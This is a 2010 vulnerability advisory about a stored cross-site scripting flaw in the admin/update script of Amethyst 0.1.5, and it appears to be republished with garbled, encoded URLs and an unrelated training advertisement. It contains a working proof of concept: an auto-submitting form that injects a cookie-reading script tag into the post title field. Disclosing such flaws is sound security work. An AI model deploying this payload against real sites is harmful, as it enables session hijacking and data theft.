Vulnerability ID: HTB22502  

Reference: c48K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3S2@1j5Y4u0A6k6r3N6W2i4K6u0W2j5$3S2Q4x3V1k6S2k6s2k6A6M7$3!0J5P5g2)9J5c8Y4S2K6M7#2)9#2k6Y4k6#2L8r3&6W2M7X3q4T1K9h3I4A6N6s2W2Q4y4h3k6A6L8W2)9#2k6X3q4E0k6i4c8Z5P5i4y4@1i4K6g2X3x3W2)9J5k6h3S2@1L8h3I4Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.

Product: Amethyst  

Vendor: Hulihan Applications ( 348K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3S2#2L8r3W2Z5j5h3&6S2M7s2m8D9K9h3y4S2N6r3W2G2L8Y4y4Q4x3X3g2U0L8$3#2Q4x3V1k6H3M7X3!0B7k6h3y4@1M7#2)9J5c8X3q4E0k6i4c8Z5P5i4y4@1 )  

Vulnerable Version: 0.1.5 and Probably Prior Versions  

Vendor Notification: 22 July 2010  

Vulnerability Type: Stored XSS (Cross Site Scripting)  

Status: Fixed by Vendor  

Risk level: Medium  

Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (467K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3S2@1j5Y4u0A6k6r3N6W2i4K6u0W2j5$3S2Q4x3V1k6Q4x3U0W2Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.

   

Vulnerability Details:  

User can execute arbitrary JavaScript code within the vulnerable application.  

   

The vulnerability exists due to failure in the admin/update script to properly sanitize user-supplied input in "post[title]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.  

   

An attacker can use browser to exploit this vulnerability. The following PoC is available:  

   

<form action="http://host/admin/update/2" method="post" name="main" >  

   

<input type="hidden" name="post[title]" value='title"><script>alert(document.cookie)</script>' />  

<input type="hidden" name="post[content]" value="this is my post" />  

<input type="hidden" name="post[created_at(1i)]" value="2010" />  

<input type="hidden" name="post[created_at(2i)]" value="7" />  

<input type="hidden" name="post[created_at(3i)]" value="15" />  

<input type="hidden" name="post[created_at(4i)]" value="20" />  

<input type="hidden" name="post[created_at(5i)]" value="39" />  

<input type="hidden" name="post[updated_at(1i)]" value="2010" />  

<input type="hidden" name="post[updated_at(2i)]" value="7" />  

<input type="hidden" name="post[updated_at(3i)]" value="15" />  

<input type="hidden" name="post[updated_at(4i)]" value="20" />  

<input type="hidden" name="post[updated_at(5i)]" value="39" />  

<input type="hidden" name="commit" value="Create" />  

   

</form>  

<script>  

document.main.submit();  

</script>  

   

Solution: Upgrade to the most recent version

[培训]科锐逆向工程师培训第53期2025年7月8日开班！